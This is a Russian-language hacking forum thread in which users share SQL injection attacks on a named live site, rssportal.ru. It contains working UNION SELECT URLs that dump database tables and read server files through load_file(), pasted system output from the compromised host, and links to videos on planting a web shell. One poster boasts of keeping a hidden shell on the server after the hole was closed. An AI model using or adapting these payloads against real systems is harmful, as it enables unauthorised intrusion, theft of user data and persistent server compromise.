Injection на rssportal.ru Хотелось бы отметить ету инж., так как там есть сами посмотрите что Хотя ето не новость Вот ищо несколько injection на етом же сайте: Code: http://rssportal.ru/catalog.php?rss_id=-54161+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 Code: http://rssportal.ru/catalog.php?cat_id=-1+UNION+SELECT+1,name,3,4,5,6,7,8+FROM+category/* Code: http://rssportal.ru/registration.php?uid=1&confirm=blablabla' Вот и видео: http://video.antichat.ru/download_228.html
Смотрел на ускоренном воспроизведении Видео не стоило снимать имхо. Инъекция стандартна. Могли простенькую шифровку пассов поставить.. PS Вот если бы ты шелл залил, был бы хоть какой то материал.
Code: http://rssportal.ru/catalog.php?cat_id=-57+UNION+SELECT+1,load_file(%22/home/rss/rssagg.wrk.infostars.ru/htdocs/admin.php%22),3,4,5,6,7,8+FROM+user+WHERE+id=2/* даж файлы читать мона)
. Linux frig 2.6.11-1.1369_FC4smp #1 SMP Thu Jun 2 23:08:39 EDT 2005 i686 i686 i386 GNU/Linux uid=514(rss) gid=2(daemon) группы=2(daemon),99(nobody),107(rss)
УУУ пацаны опередили меня))) я то тоже там нашел маса инэекцый и багов.. но б**я никак неполучалося достучаца нормально.=\
Вот недавно прикрыли багу, и шелл. Но я успел припрятать ищо один...)) А вот и старое видео по Создание шелла через SQL_injection на rssportal.ru: http://webfile.ru/1455194
